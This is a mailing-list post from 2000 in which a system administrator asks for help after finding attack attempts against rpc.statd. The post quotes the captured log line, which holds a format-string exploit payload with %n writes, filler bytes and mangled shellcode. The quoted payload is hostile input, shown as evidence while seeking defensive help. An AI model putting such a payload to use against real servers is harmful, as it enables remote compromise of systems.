rpc.statd vulnerability exploit attempts

Sun, 10 Sep 2000 07:24:18 -0700 

hiya - I've been having some script kiddies trying to break into our 
servers (again) but don't remember seeing messages like this before 
in my log files.

What annoys me most about this attempt is that I don't have any 
record of where the connection came from, or any other relevant 
messages in ANY log files at the time of this error - or a minute 
before or after the time of the attempt - so I can't really tell who 
this was and send out security alerts to the server admin or ISP 
involved and get the kiddies smacked.

Can someone suggest a method for logging all nfs mount attempts from 
outside our network - and even blocking them as they happen... and 
any other ways I can tighten up our security to keep the kiddies out 
of our network?

TIA. dan.

------ kiddie attempt log entries follow ---------------

Sep  9 02:09:19 server rpc.statd[366]: gethostbyname error for 
^X—ψ^X—ψ^Y—ψ^Y—ψ^Z—ψ^Z—ψ^[—ψ^[—ψ%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκ1ΏΞ|YβA^PβA^HœΏβA^D∜Ώβ^AƒfΥΔ„^BβY^LA^NτA^H^PβI^DΔA^D^Lΰ^AƒfΥΔ„^DƒfΥΔ„^E0ΏΰA^DƒfΥΔβ‘ΰˆ1Šƒ?Υ
-- 

        Nitro - 3D Visualisation, Graphics & Animation
                Ph (+61 2) 9810 5177 - Fx (+61 2) 9810 0199
                        http://www.nitro.com.au/



_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list

Reply via email to